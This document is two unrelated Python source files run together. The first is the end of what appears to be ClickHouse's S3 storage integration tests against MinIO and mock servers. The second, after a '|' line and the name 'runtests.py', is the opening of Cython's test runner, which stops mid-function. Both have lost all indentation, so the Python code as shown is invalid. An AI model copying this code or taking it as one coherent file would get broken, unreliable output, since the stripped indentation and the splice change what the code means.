pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
pytest.param("''", id="1_argument"),
pytest.param("'','','','','',''", id="6_arguments"),
])
def test_wrong_s3_syntax(started_cluster, s3_storage_args):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500000,500000"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
from collections import defaultdict
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
CAN_SYMLINK = sys.platform != 'win32' and hasattr(os, 'symlink')
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro and getattr(numpy, '__version__', '') not in ('1.19.0', '1.19.1'):
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_gdb_extension(ext, _has_gdb=[None]):
# We should probably also check for Python support.
if not include_debugger:
_has_gdb[0] = False
if _has_gdb[0] is None:
try:
subprocess.check_call(["gdb", "--version"])
except (IOError, subprocess.CalledProcessError):
_has_gdb[0] = False
else:
_has_gdb[0] = True
if not _has_gdb[0]:
return EXCLUDE_EXT
return ext
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
from distutils import ccompiler
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:gdb': update_gdb_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
'tag:py3only': exclude_extension_in_pyver((2, 7)),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
'run.time_pxd', # _PyTime_GetSystemClock doesn't exist in 3.4
]),
(3,7): (operator.lt, lambda x: x in ['run.pycontextvar',
'run.pep557_dataclasses', # dataclasses module
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
CDEFS = []
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x)) # needs lambda to set function attribute
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items(), key=operator.itemgetter(1), reverse=True):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.test_selector = re.compile(options.only_pattern).search if options.only_pattern else None
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
# TODO: parallelise I/O with a thread pool for the different directories once we drop Py2 support
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if (sys.platform not in ['win32'] and self.add_embedded_test
# the embedding test is currently broken in Py3.8+, except on Linux.
and (sys.version_info < (3, 8) or sys.platform != 'darwin')):
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if self.cython_only:
# EndToEnd tests always execute arbitrary build and test code
continue
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if 'c' in languages and skip_c(tags):
languages = list(languages)
languages.remove('c')
if 'cpp' in languages and 'no-cpp' in tags['tag']:
languages = list(languages)
languages.remove('cpp')
if not languages:
return []
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
